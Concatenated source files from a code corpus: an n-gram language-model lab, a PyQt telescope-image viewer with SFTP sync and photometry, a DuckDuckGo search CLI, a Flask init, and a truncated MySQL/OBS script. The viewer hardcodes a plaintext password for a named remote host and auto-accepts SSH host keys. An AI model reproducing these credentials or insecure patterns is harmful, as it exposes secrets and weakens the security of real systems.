sentence based on rule given in the specific grammer\r\ndef generate(gram, target):\r\n if target not in gram: return target # means target is a terminal expression\r\n expaned = [generate(gram, t) for t in choice(gram[target])]\r\n return ' '.join([e if e != '/n' else '\\n' for e in expaned if e != 'null'])\r\n\r\nfilename = 'C:/Users/38079/OneDrive/桌面/NLP/Assignment/l1/movie_comments.csv'\r\ncontent = pd.read_csv(filename, encoding='UTF-8', low_memory=False)\r\n# print(content.head())\r\narticles = content['comment'].tolist()\r\n# print((articles[0]))\r\n\r\n#Remove special characters such as line breaks: use regular matching to directly extract words\r\ndef token(string):\r\n return re.findall('\\w+', string)\r\n\r\n# print(token(articles[1]))\r\n# print(list(jieba.cut(articles[110])))\r\n# with_jieba_cut = Counter(jieba.cut(articles[110]))\r\n# print(with_jieba_cut.most_common()[:10])\r\n# print(''.join(token(articles[110])))\r\n\r\n#Cleaning text\r\narticles_clean = [''.join(token(str(a)))for a in articles]\r\n# print(len(articles_clean))\r\n# print((articles_clean[1]))\r\n\r\n# Write plain text to txt\r\nwith open('article.txt', 'w', encoding='utf-8') as f:\r\n for a in articles_clean:\r\n f.write(a + '\\n')\r\n\r\n#Word segmentation\r\ndef cut(string): return list(jieba.cut(string))\r\nTOKEN = []\r\nfor i, line in enumerate((open('article.txt',encoding='utf-8'))):\r\n if i % 10000 == 0: print(i)\r\n if i > 20000: break \r\n TOKEN += cut(line)\r\n\r\nwords_count = Counter(TOKEN)# Do statistics\r\n#print(words_count.most_common(100))\r\nfrequiences = [f for w, f in words_count.most_common(100)]\r\nx = [i for i in range(100)]\r\n\r\n#Visualization (Plot the vocabulary frequency of the top 100 statistical results)\r\nfig = plt.figure()\r\nax1 = fig.add_subplot(2,1,1) # 画2行1列个图形的第1个\r\nax2 = fig.add_subplot(2,1,2) # 画2行1列个图形的第2个\r\nax1.plot(x, frequiences)\r\n# print(plt.plot(x, np.log(frequiences)))\r\nax2.plot(x, np.log(frequiences))\r\nplt.show()\r\n\r\n# Probability of occurrence of a single word\r\n# def prob_1(word):\r\n# return words_count[word] / len(TOKEN)\r\n# print(prob_1('我们'))\r\nTOKEN[:10]\r\nTOKEN = [str(t) for t in TOKEN]\r\nTOKEN_2_GRAM = [''.join(TOKEN[i:i+2]) for i in range(len(TOKEN[:-2]))]\r\n# Concatenate adjacent words and store them in a list\r\nTOKEN_2_GRAM[:10]\r\nwords_count_2 = Counter(TOKEN_2_GRAM)\r\n\r\n# Probability of two consecutive words appearing\r\ndef prob_2(word1, word2):\r\n if word1 + word2 in words_count_2: return words_count_2[word1+word2] / len(TOKEN_2_GRAM)#pr(w1|w2)=pr(w1w2)/pr(w2)\r\n else:#out of vocabulary problem\r\n return 1 / len(TOKEN_2_GRAM)\r\n# print(prob_2('我们', '在'))\r\n\r\n# Get sentence probability\r\ndef get_probablity(sentence):\r\n words = cut(sentence)\r\n sentence_pro = 1\r\n for i, word in enumerate(words[:-1]):\r\n next_ = words[i+1]\r\n probability = prob_2(word, next_)\r\n sentence_pro *= probability\r\n return sentence_pro\r\n\r\n# Generate the most reasonable sentence\r\ndef generate_best(grammer):\r\n sentences=[]\r\n for sen in [generate(gram=grammer, target='sentence') for i in range(10)]:\r\n sentence=()\r\n sentence= (sen, get_probablity(sen))\r\n sentences.append(sentence)\r\n sentences=sorted(sentences, key=lambda x: x[1], reverse=True)\r\n print(sentences[0])\r\n\r\ngenerate_best(create_grammar(commenter, split='='))", "sub_path": "Lab1/LanguageModel.py", "file_name": "LanguageModel.py", "file_ext": "py", "file_size_in_byte": 4282, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "random.choice", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 40, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 47, "usage_type": "call"}, {"api_name": "jieba.cut", "line_number": 66, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "numpy.log", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 85, "usage_type": "name"}, {"api_name": "collections.Counter", "line_number": 96, "usage_type": "call"}]} {"seq_id": "57099401", "text": "import pyqtgraph as pg\nfrom PyQt4 import QtCore, QtGui, uic\nimport os\nimport sys\nimport glob\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.figure import Figure\nfrom matplotlib.backends.backend_qt4agg import (\n FigureCanvasQTAgg as FigureCanvas,\n NavigationToolbar2QT as NavigationToolbar)\nfrom astropy.io import fits\nfrom sklearn.metrics import mean_squared_error\nfrom photutils.background import Background\nfrom photutils import detect_sources\nfrom photutils.utils import random_cmap\nfrom photutils import source_properties, properties_table\nimport paramiko\n\n# set directory\n#parentDir = r'K:\\Google Drive\\DESI\\protoDESI\\images\\fpc_data'\ndirRemote = r'/home/msdos/SBIG/'\ndirLocal = os.path.join(os.path.expanduser(\"~\"), 'Downloads', 'SBIG')\ndatasetID = ''\ndatasetDirRemote = os.path.join(dirRemote, datasetID)\ndatasetDirLocal = os.path.join(dirLocal, datasetID)\ndomain = 'desisti.kpno.noao.edu'\nusername = 'msdos'\npassword = 'MS-d0s'\nautosync = True\nprintEnabled = True\npg.mkQApp()\n\n#%% Define main window class from UI file\n\nuiPath = os.path.dirname(os.path.abspath(__file__))\nuiFile = os.path.join(uiPath, 'sti_gui.ui')\n[WindowTemplate, TemplateBaseClass] = uic.loadUiType(uiFile)\n\ndef compare_sets(sftp):\n \n setRemote = set(sftp.listdir(datasetDirRemote))\n listRemote = list(setRemote)\n listRemoteConverted = list(listRemote)\n for i in range(len(listRemote)):\n listRemoteConverted[i] = listRemoteConverted[i].replace(':','_')\n setRemoteConverted = set(listRemoteConverted)\n setLocal = set(os.listdir(datasetDirLocal))\n setTransferConverted = setRemoteConverted - (setRemoteConverted & setLocal)\n setTransfer = set(setTransferConverted)\n for filename in setTransferConverted:\n i = listRemoteConverted.index(filename)\n setTransfer.remove(listRemoteConverted[i])\n setTransfer.add(listRemote[i])\n return setTransfer\n\nclass ListeningHost(QtCore.QThread):\n \n emitter = QtCore.pyqtSignal(object)\n \n def __init__(self, sftp):\n \n self.newDataAvailable = False\n self.sftp = sftp\n QtCore.QThread.__init__(self)\n \n def run(self):\n \n while self.newDataAvailable is False:\n \n# print('Listening host is actively checking for new data...')\n setTransfer = compare_sets(self.sftp)\n\n if len(setTransfer) is 0:\n self.newDataAvailable = False\n else:\n self.newDataAvailable = True\n self.emitter.emit(None)\n \n# while self.newDataAvailable is True:\n# self.emitter.emit(None)\n\nclass MainWindow(TemplateBaseClass):\n \n def __init__(self):\n \n TemplateBaseClass.__init__(self)\n # super(MainWindow, self).__init__()\n \n # create the main window\n self.ui = WindowTemplate()\n self.ui.setupUi(self)\n #self.ui.plotBtn.clicked.connect(self.plot)\n self.show()\n self.setWindowTitle('ProtoDESI ST-i Focusing Viewer')\n self.ui.actionSync.triggered.connect(self.sync)\n \n # establish ssh\n self.open_ssh(domain, username, password) \n\n self.updateFileList()\n segFig = Figure()\n self.addmpl(segFig)\n # show first image initially\n if len(self.ui.listRaw) > 0:\n filename = self.ui.listRaw.item(0).text()\n self.updateRaw(filename)\n \n # configure listener\n self.listeningHost = ListeningHost(self.sftp)\n self.listeningHost.emitter.connect(self.receiver)\n self.listeningHost.start()\n self.msg('Listening host started.')\n \n def msg(self, text):\n \n self.ui.statusbar.showMessage(text)\n if printEnabled:\n print(text)\n \n def paramiko_sftp_progress(self, transferred, total):\n \n percentage = transferred/total*100\n total_mb = total/(1024**2)\n self.msg('{0:.2f}%, Total {1:.2f} MB \\r'.format(percentage, total_mb))\n# self.ui.statusbar.showMessage('{0:.2f}%, Total {1:.2f} MB \\r'.format(percentage, total_mb))\n\n \n def addmpl(self, fig):\n \n self.ui.canvas = FigureCanvas(fig)\n self.ui.segViewLayout.addWidget(self.ui.canvas)\n self.ui.canvas.draw()\n self.ui.toolbar = NavigationToolbar(self.ui.canvas, \n self.ui.segView, coordinates=True)\n self.ui.segViewLayout.addWidget(self.ui.toolbar)\n \n def rmmpl(self):\n self.ui.segViewLayout.removeWidget(self.ui.canvas)\n self.ui.canvas.close()\n self.ui.segViewLayout.removeWidget(self.ui.toolbar)\n self.ui.toolbar.close()\n\n def open_ssh(self, domain, user, pw):\n \n self.msg('Establishing SSH...')\n self.ssh = paramiko.SSHClient()\n self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n self.ssh.connect(domain, username=user, password=pw)\n \n self.msg('Establishing SFTP...')\n self.sftp = self.ssh.open_sftp()\n \n def sync(self):\n \n # respond to user click on sync button, and perform actual sync\n \n self.msg('Syncing new data to local drive...')\n \n if self.listeningHost.newDataAvailable:\n \n setTransfer = compare_sets(self.sftp)\n self.msg('Files to be transferred: ' + repr(setTransfer))\n \n for filename in setTransfer:\n self.msg('Transferring {} ...'.format(filename))\n filenameLocal = filename.replace(':', '_')\n try:\n self.sftp.get(\n os.path.join(datasetDirRemote, filename), \n os.path.join(datasetDirLocal, filenameLocal),\n callback = self.paramiko_sftp_progress\n )\n self.msg('Transfer is complete: {}.'.format(filename))\n except:\n self.msg('Skipping file: {}'.format(filename))\n pass\n \n self.listeningHost.newDataAvailable = False\n self.listeningHost.start()\n self.updateFileList()\n \n else:\n self.msg('No new data available for sync.')\n \n def receiver(self):\n \n # receiver for listener emitter\n if self.listeningHost.newDataAvailable:\n self.msg('New data available. Sync Now.')\n if autosync:\n self.msg('Autosync is on. Auto-syncing...')\n self.sync()\n else:\n self.msg('No new data available.')\n \n def updateFileList(self):\n \n self.msg('Updating file lists...')\n \n # filename patterns\n os.chdir(dirLocal)\n namePatternRaw = '**/*.fit*'\n imgEntries = glob.glob(namePatternRaw, recursive=True)\n\n # populate list raw\n self.ui.listRaw.clear()\n self.ui.listRaw.addItems(imgEntries)\n \n # populate list master\n self.ui.listMaster.clear()\n self.ui.listMaster.addItems(imgEntries)\n \n def updateRaw(self, filename):\n \n self.msg(repr('Showing image:'+ filename))\n filepath = os.path.join(dirLocal, filename)\n hdu = fits.open(filepath)[0]\n \n # display header\n self.ui.headerView.setCurrentFont(QtGui.QFont('Courier'))\n self.ui.headerView.setFontPointSize(9)\n self.ui.headerView.setPlainText(repr(hdu.header))\n \n # display image selected\n minlevel = np.amin(hdu.data)\n maxlevel = 2000\n self.ui.rawView.show()\n self.ui.rawView.setImage(np.rot90(hdu.data, -1))\n self.ui.rawView.setLevels(minlevel, maxlevel)\n #self.ui.rawView.autoLevels()\n\n def updatePhot(self, filename):\n \n filepath = os.path.join(datasetDirLocal, 'master', filename)\n hdu = fits.open(filepath)[0]\n data = hdu.data\n \n # display master preview\n self.msg('Showing master image:' + repr(filename))\n self.rmmpl()\n segFig = Figure()\n# cmapRand = random_cmap(segm.max+1, random_state=12345)\n axes = segFig.add_subplot(111)\n axes.imshow(data, origin='lower', cmap=plt.cm.gray)\n self.addmpl(segFig)\n\n # perform photometry\n self.msg('Performing aperture photometry...')\n self.aperture_photometry(filename)\n \n def aperture_photometry(self, filename):\n\n # aperture photometry from source segmentation\n \n # determine threshold for background detection\n # if LEDoff was used, get threshold from LEDoff/background\n filepath = os.path.join(datasetDirLocal, 'master', filename)\n filenameCombined = '\\t'.join(os.listdir(os.path.join(datasetDirLocal, 'master')))\n if 'master_ledoff_subtracted' in filename:\n self.msg('Using master_ledoff')\n # filepath = os.path.join(datasetDir, 'master', filename)\n hdu = fits.open(filepath)[0]\n data_subtracted = hdu.data\n # calculate threadhold\n ledoff_pred = np.mean(data_subtracted) * np.ones(data_subtracted.shape)\n mse = mean_squared_error(data_subtracted, ledoff_pred) \n rmse = np.sqrt(mse)\n threshold = 7.0 * rmse\n threshold_value = threshold\n \n # if no LEDoff was used, background subtraction is needed\n # there should exist no file named \"subtracted\"\n elif 'master.fit' in filenameCombined \\\n or 'master_normalised.fit' in filenameCombined:\n self.ui.statusbar.showMessage('Using master or master_normalised')\n \n # create preliminary mask \n \"\"\" make_source_mask not yet available in photutils v0.2.1\n wait for v0.3 release\n \"\"\"\n #from photutils import make_source_mask\n #masterMask = make_source_mask(master, snr=2, npixels=5, dilate_size=11)\n \n # background subtraction\n \"\"\" create 2D image of background and background rms and \n apply sigma-clipping to each region in the low-res \n background map to get mean, median, and std/rms. \n sigma-clipping is the most widely used method though not as \n good as using mask; still superior to robust standard \n deviation using median absolute deviation (MAD-STD)\n \"\"\"\n \n \n hdu = fits.open(filepath)[0]\n data = hdu.data\n if 'EXPTIME' in hdu.header:\n exptime = hdu.header['EXPTIME']\n else:\n exptime = hdu.header['EXPREQ']\n \n self.msg('Determining threshold for target detection...')\n # calculate threashold\n # [mean, median, std] = sigma_clipped_stats(master, sigma=3.0, iters=5)\n bkg = Background(data, (100, 100), filter_shape=(3, 3), method='median')\n # bkg = Background(master, (50, 50), filter_size=(3, 3), method='median')\n # plt.imshow(bkg.background, norm=normalisation, origin='lower', cmap=plt.cm.gray)\n plt.imshow(bkg.background, origin='lower', cmap=plt.cm.gray)\n [fig, ax] = plt.subplots(figsize=(8, 8))\n # make background-substracted image\n data_subtracted = data - bkg.background\n # plot\n plt.imshow(data_subtracted, origin='lower', cmap=plt.cm.gray)\n \n # save background subtracted image\n if 'master.fit' in filename:\n hdu_subtracted = fits.PrimaryHDU(data_subtracted)\n hdu_subtracted.writeto('master_subtracted.fits', clobber = True)\n elif 'master_normalised.fit' in filename:\n hdu_normalised_subtracted = fits.PrimaryHDU(data_subtracted)\n hdu_normalised_subtracted.writeto('master_normalised_subtracted.fits', clobber = True)\n \n # segmentation at a given sigma level, for regional properties\n threshold = 5.0 * bkg.background_rms # since data is background-subtracted\n threshold_value = threshold.flat[0]\n \n self.msg('Threshold for target detection is: ' + repr(threshold_value))\n # perform segmentation whether flat was available or not\n self.msg('Performing segmentation...')\n segm = detect_sources(data_subtracted, threshold, npixels=5)\n \n self.msg('Segmentation labels are:')\n self.msg((str(segm.labels)))\n # measure regional source properties from segmentation\n # the centroid is from image moments, already intensity-weighted\n self.msg('Measuring source properties')\n if 'bkg' in locals():\n props = source_properties(data_subtracted, segm,\n error = bkg.background_rms, background = bkg.background)\n elif 'master_ledoff_subtracted' in filenameCombined:\n filepath = os.path.join(datasetDirLocal, 'master', 'master_ledoff_subtracted.fits')\n hdu = fits.open(filepath)[0]\n master_ledoff_subtracted = hdu.data\n props = source_properties(data_subtracted, segm,\n error = master_ledoff_subtracted - np.mean(master_ledoff_subtracted),\n background = master_ledoff_subtracted)\n \n # instrumental magnitude = -2.5 * log10(flux)\n for i in range(len(props)):\n props[i].mag_instr = -2.5 * np.log10(props[i].source_sum/exptime)\n # source_sum are by definition background-subtracted already\n propsTableColumns = ['id', 'xcentroid', 'ycentroid', 'area', 'max_value',\n 'source_sum', 'mag_instr']\n # there are other properties available, see list of SourceProperties\n # http://photutils.readthedocs.io/en/latest/api/photutils.segmentation.SourceProperties.html#photutils.segmentation.SourceProperties\n \n propsTable = properties_table(props, columns = propsTableColumns)\n self.ui.statusbar.showMessage(repr(propsTable))\n \n # plot segmentated image\n self.rmmpl()\n segFig = Figure()\n cmapRand = random_cmap(segm.max+1, random_state=12345)\n axes = segFig.add_subplot(111)\n axes.imshow(segm, origin='lower', cmap=cmapRand)\n axes.plot(propsTable['xcentroid'], propsTable['ycentroid'], ls='none', color='red',\n marker='+', ms=10, lw=1.5)\n self.addmpl(segFig)\n \n # set properties table font and font size\n self.ui.tablePhot.setCurrentFont(QtGui.QFont('Courier'))\n self.ui.tablePhot.setFontPointSize(9)\n self.ui.tablePhot.setPlainText(repr(propsTable))\n \n self.msg('Photometry completed')\n# # plots for visualisation\n# \n# apertures = []\n# for prop in props:\n# position = (prop.xcentroid.value, prop.ycentroid.value)\n# a = prop.semimajor_axis_sigma.value * 3.0\n# b = prop.semiminor_axis_sigma.value * 3.0\n# theta = prop.orientation.value\n# apertures.append(EllipticalAperture(position, a, b, theta=theta))\n# norm = ImageNormalize(stretch=SqrtStretch())\n# fig, (ax1, ax2) = plt.subplots(2, 1, figsize=(18, 18))\n# \n# if 'bkg' in locals():\n# ax1.imshow(master_subtracted, origin='lower', cmap='Greys_r', norm=norm)\n# else:\n# ax1.imshow(master_subtracted_normalised, origin='lower', cmap='Greys_r', norm=norm)\n# ax2.imshow(segm, origin='lower', cmap=cmapRand)\n# for aperture in apertures:\n# aperture.plot(color='blue', lw=1.5, alpha=0.5, ax=ax1)\n# aperture.plot(color='white', lw=1.5, alpha=1.0, ax=ax2)\n\n#%% Start Qt event loop unless running in interactive mode or using pyside\n\nmain = MainWindow()\n\nif __name__ == '__main__':\n\n if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):\n \n def raw_item_changed(curr, prev):\n filename = curr.text()\n main.updateRaw(filename)\n \n def master_item_changed(curr, prev):\n filename = curr.text()\n main.updatePhot(filename)\n\n main.ui.listRaw.currentItemChanged.connect(raw_item_changed)\n main.ui.listMaster.currentItemChanged.connect(master_item_changed)\n \n QtGui.QApplication.instance().exec_()", "sub_path": "pd_fpc_analyses_of_parker/sti_viewer_standalone/sti_gui.py", "file_name": "sti_gui.py", "file_ext": "py", "file_size_in_byte": 16449, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "os.path.join", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.path.expanduser", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "pyqtgraph.mkQApp", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "PyQt4.uic.loadUiType", "line_number": 38, "usage_type": "call"}, {"api_name": "PyQt4.uic", "line_number": 38, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 48, "usage_type": "call"}, {"api_name": "PyQt4.QtCore.QThread", "line_number": 57, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 57, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.pyqtSignal", "line_number": 59, "usage_type": "call"}, {"api_name": "PyQt4.QtCore", "line_number": 59, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.QThread.__init__", "line_number": 65, "usage_type": "call"}, {"api_name": "PyQt4.QtCore.QThread", "line_number": 65, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 65, "usage_type": "name"}, {"api_name": "matplotlib.figure.Figure", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.backends.backend_qt4agg.FigureCanvasQTAgg", "line_number": 131, "usage_type": "call"}, {"api_name": "matplotlib.backends.backend_qt4agg.NavigationToolbar2QT", "line_number": 134, "usage_type": "call"}, {"api_name": "paramiko.SSHClient", "line_number": 147, "usage_type": "call"}, {"api_name": "paramiko.AutoAddPolicy", "line_number": 148, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 170, "usage_type": "call"}, {"api_name": "os.path", "line_number": 170, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 171, "usage_type": "call"}, {"api_name": "os.path", "line_number": 171, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 202, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 204, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 217, "usage_type": "call"}, {"api_name": "os.path", "line_number": 217, "usage_type": "attribute"}, {"api_name": "astropy.io.fits.open", "line_number": 218, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 218, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QFont", "line_number": 221, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 221, "usage_type": "name"}, {"api_name": "numpy.amin", "line_number": 226, "usage_type": "call"}, {"api_name": "numpy.rot90", "line_number": 229, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 235, "usage_type": "call"}, {"api_name": "os.path", "line_number": 235, "usage_type": "attribute"}, {"api_name": "astropy.io.fits.open", "line_number": 236, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 236, "usage_type": "name"}, {"api_name": "matplotlib.figure.Figure", "line_number": 242, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 245, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 245, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 258, "usage_type": "call"}, {"api_name": "os.path", "line_number": 258, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 259, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 259, "usage_type": "call"}, {"api_name": "os.path", "line_number": 259, "usage_type": "attribute"}, {"api_name": "astropy.io.fits.open", "line_number": 263, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 263, "usage_type": "name"}, {"api_name": "numpy.mean", "line_number": 266, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 266, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 267, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 268, "usage_type": "call"}, {"api_name": "astropy.io.fits.open", "line_number": 295, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 295, "usage_type": "name"}, {"api_name": "photutils.background.Background", "line_number": 305, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 308, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 308, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 308, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 309, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 309, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 313, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 313, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 313, "usage_type": "attribute"}, {"api_name": "astropy.io.fits.PrimaryHDU", "line_number": 317, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 317, "usage_type": "name"}, {"api_name": "astropy.io.fits.PrimaryHDU", "line_number": 320, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 320, "usage_type": "name"}, {"api_name": "photutils.detect_sources", "line_number": 330, "usage_type": "call"}, {"api_name": "photutils.source_properties", "line_number": 338, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 341, "usage_type": "call"}, {"api_name": "os.path", "line_number": 341, "usage_type": "attribute"}, {"api_name": "astropy.io.fits.open", "line_number": 342, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 342, "usage_type": "name"}, {"api_name": "photutils.source_properties", "line_number": 344, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 345, "usage_type": "call"}, {"api_name": "numpy.log10", "line_number": 350, "usage_type": "call"}, {"api_name": "photutils.properties_table", "line_number": 357, "usage_type": "call"}, {"api_name": "matplotlib.figure.Figure", "line_number": 362, "usage_type": "call"}, {"api_name": "photutils.utils.random_cmap", "line_number": 363, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QFont", "line_number": 371, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 371, "usage_type": "name"}, {"api_name": "sys.flags", "line_number": 403, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 403, "usage_type": "argument"}, {"api_name": "PyQt4.QtGui.QApplication.instance", "line_number": 416, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QApplication", "line_number": 416, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 416, "usage_type": "name"}]} {"seq_id": "523108934", "text": "from .api import search\nimport sys\nimport json\n\nif __name__ == '__main__':\n if len(sys.argv) < 2:\n print(\"Search term needed!\")\n print(\"Usage: python -m duckduckgo_images_api TERM count(optional)\")\n else:\n count = 40\n if (len(sys.argv) > 2):\n count = int(sys.argv[2])\n print(json.dumps(search(sys.argv[1], count)))", "sub_path": "duckduckgo_images_api/__main__.py", "file_name": "__main__.py", "file_ext": "py", "file_size_in_byte": 366, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "sys.argv", "line_number": 6, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 11, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 12, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 13, "usage_type": "call"}, {"api_name": "api.search", "line_number": 13, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 13, "usage_type": "attribute"}]} {"seq_id": "589801713", "text": "# -*- coding:utf-8 -*-\n\n\nfrom flask import (\n g,\n Flask,\n request\n)\nfrom flask.ext.sqlalchemy import SQLAlchemy\nfrom poseidon.utils.token import TokenManager\nfrom poseidon.utils.sku import SkuManager\nfrom poseidon.settings import (\n MYSQL_CONFIG,\n REDIS_CONFIG,\n REDIS_TOKEN_EXPIRE,\n INIT_SKU\n)\n\napp = Flask(__name__)\n\n# sqlalchemy\napp.config['SQLALCHEMY_DATABASE_URI'] =\\\n 'mysql+pymysql://{username}:{password}@{host}:{port}/{database}'.format(\n **MYSQL_CONFIG)\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True\napp.config['SQLALCHEMY_POOL_RECYCLE'] = 1200\napp.config['SQLALCHEMY_POOL_SIZE'] = 10\napp.config['SQLALCHEMY_MAX_OVERFLOW'] = -1\ndb = SQLAlchemy(app)\n\n# redis token\ntoken_manager = TokenManager(REDIS_CONFIG, REDIS_TOKEN_EXPIRE)\n# redis sku\nsku_manager = SkuManager(INIT_SKU, REDIS_CONFIG)\n\n# from restful_doc import auto_doc\nfrom poseidon import api\n# api.api_init = auto_doc(app, True, 'docs/api_doc.md',\n# 'markdown')(api.api_init) #noqa\napp = api.api_init(app)\n\n# add ping\napp.route('/ping')(lambda: 'PONG')\n\n\n@app.before_request\ndef before_hook():\n token = request.headers.get('x-token')\n user_id = token_manager.get_user(token)\n if user_id:\n g.user_id = user_id\n", "sub_path": "poseidon/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 1229, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "flask.Flask", "line_number": 19, "usage_type": "call"}, {"api_name": "poseidon.settings.MYSQL_CONFIG", "line_number": 24, "usage_type": "name"}, {"api_name": "flask.ext.sqlalchemy.SQLAlchemy", "line_number": 29, "usage_type": "call"}, {"api_name": "poseidon.utils.token.TokenManager", "line_number": 32, "usage_type": "call"}, {"api_name": "poseidon.settings.REDIS_CONFIG", "line_number": 32, "usage_type": "argument"}, {"api_name": "poseidon.settings.REDIS_TOKEN_EXPIRE", "line_number": 32, "usage_type": "argument"}, {"api_name": "poseidon.utils.sku.SkuManager", "line_number": 34, "usage_type": "call"}, {"api_name": "poseidon.settings.INIT_SKU", "line_number": 34, "usage_type": "argument"}, {"api_name": "poseidon.settings.REDIS_CONFIG", "line_number": 34, "usage_type": "argument"}, {"api_name": "poseidon.api.api_init", "line_number": 40, "usage_type": "call"}, {"api_name": "poseidon.api", "line_number": 40, "usage_type": "name"}, {"api_name": "flask.request.headers.get", "line_number": 48, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 48, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 48, "usage_type": "name"}, {"api_name": "flask.g.user_id", "line_number": 51, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 51, "usage_type": "name"}]} {"seq_id": "561655825", "text": "#!/usr/bin/env python\n\nimport sys\nimport time\nimport logging\nfrom datetime import datetime\nfrom datetime import timedelta \nimport socket\nimport websocket #pip install websocket-client\nimport hashlib\nimport base64\nimport json\nimport mysql.connector #pip install mysql-connector-python\nfrom mysql.connector import Error\ntry:\n import thread\nexcept ImportError:\n import _thread as thread\n\n\n#MariaDB settings. Port = 3306 or 3307\nmysqlconfig = {\n 'user': 'user',\n 'password': 'pass',\n 'host': 'localhost',\n 'port': '3306',\n 'database': 'OBSdb',\n 'raise_on_warnings': True\n}\n\nwritelog = 0\n\nargs = sys.argv[1:]\nif len(args):\n\tCW = args[0]\n\tif CW == '-l':\n\t\twritelog = 1\n\t\tprint (\"Logfile will be made.\")\n\nif writelog:\n\tlogging.basicConfig(filename=time.strftime(\"%Y%m%d%H%M%S\") + '.log', level=logging.INFO)\n\tlogging.info('Started')\n \ntry:\n\tconnection = mysql.connector.connect(**mysqlconfig)\n\tif connection.is_connected():\n\t\tdb_Info = connection.get_server_info()\n\t\tprint(\"Connected to MySQL Server version \", db_Info)\n\t\tif writelog:\n\t\t\tlogging.info(time.strftime(\"%Y%m%d%H%M%S\") + \": Connected to MySQL Server version \" + db_Info)\n\t\tmycursor = connection.cursor(dictionary=True)\n\t\tmycursor.execute(\"SELECT * FROM host\")\n\t\trecords = mycursor.fetchall()\n\t\tfor row in records:\n\t\t\thost = row[\"hostname\"]\n\t\t\tport = row[\"port\"]\n\t\t\tpassword = 